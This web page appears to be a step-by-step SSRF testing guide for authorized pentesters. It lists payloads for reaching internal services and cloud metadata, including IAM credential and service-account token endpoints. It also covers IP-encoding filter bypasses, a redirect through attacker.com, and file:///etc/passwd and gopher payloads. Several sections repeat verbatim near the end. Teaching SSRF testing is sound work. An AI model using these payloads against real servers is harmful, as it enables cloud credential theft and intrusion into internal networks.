Home GuidesSSRF Testing Guide

SSRF Testing Guide

Learn how to identify and exploit Server-Side Request Forgery (SSRF) vulnerabilities to access internal services, cloud metadata, and bypass network restrictions.

Intermediate

6 steps20 payload examples~60 min

Authorized testing only. Only use these techniques on systems you have explicit permission to test.

Identify URL-fetching functionality

Look for features that fetch external resources: URL previews, PDF generators, image importers, webhook configurations, and file download endpoints. Any parameter accepting a URL is a potential SSRF vector.

Example payloads

url=http://example.com

image=https://attacker.com/test.png

webhook=http://collaborator.example.com

Test for basic SSRF

Submit an out-of-band URL (Burp Collaborator, interactsh, or your own server) to confirm the server makes outbound requests. Check for DNS lookups and HTTP requests.

Example payloads

url=http://your-collaborator.burpcollaborator.net

url=http://127.0.0.1

url=http://localhost:8080

Access internal services

Try to reach internal network services. Target common internal ports (80, 443, 8080, 8443, 3306, 6379, 27017) and cloud metadata endpoints.

Example payloads

url=http://169.254.169.254/latest/meta-data/

url=http://metadata.google.internal/computeMetadata/v1/

url=http://192.168.1.1:8080/admin

url=http://[::1]:6379/

Bypass SSRF filters

If the application blocks internal IPs, try alternative representations: decimal IP, octal notation, IPv6 mappings, DNS rebinding, URL encoding, and redirect-based bypasses.

Example payloads

url=http://0x7f000001 (127.0.0.1 in hex)

url=http://2130706433 (127.0.0.1 in decimal)

url=http://0177.0.0.1 (127.0.0.1 in octal)

url=http://[::ffff:127.0.0.1]

url=http://attacker.com/redirect?to=http://169.254.169.254/

Test alternative protocols

Attempt non-HTTP protocols if the application uses libraries that support them. file://, gopher://, dict://, and ftp:// can access local files or interact with internal services.

Example payloads

url=file:///etc/passwd

url=gopher://127.0.0.1:6379/_INFO

url=dict://127.0.0.1:6379/INFO

Document impact

Record what internal services are accessible, whether cloud credentials can be extracted, and the potential for lateral movement. Classify severity based on data exposure and network access gained.

Example payloads

http://169.254.169.254/latest/meta-data/iam/security-credentials/

http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token

Related Resources

Level up your security testing

Install the CLI

npx payload-playground

Explore All Tools

Encoding, hashing, JWT & more

Browse Cheat Sheets

Quick-reference payload guides

$loading...

Identify URL-fetching functionality

Example payloads

url=http://example.com

image=https://attacker.com/test.png

webhook=http://collaborator.example.com

Access internal services

Try to reach internal network services. Target common internal ports (80, 443, 8080, 8443, 3306, 6379, 27017) and cloud metadata endpoints.

Example payloads

url=http://169.254.169.254/latest/meta-data/

url=http://metadata.google.internal/computeMetadata/v1/

url=http://192.168.1.1:8080/admin

url=http://[::1]:6379/

Bypass SSRF filters

If the application blocks internal IPs, try alternative representations: decimal IP, octal notation, IPv6 mappings, DNS rebinding, URL encoding, and redirect-based bypasses.

Example payloads

url=http://0x7f000001 (127.0.0.1 in hex)

url=http://2130706433 (127.0.0.1 in decimal)

url=http://0177.0.0.1 (127.0.0.1 in octal)

url=http://[::ffff:127.0.0.1]

url=http://attacker.com/redirect?to=http://169.254.169.254/

Document impact

Record what internal services are accessible, whether cloud credentials can be extracted, and the potential for lateral movement. Classify severity based on data exposure and network access gained.

Example payloads

http://169.254.169.254/latest/meta-data/iam/security-credentials/

http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token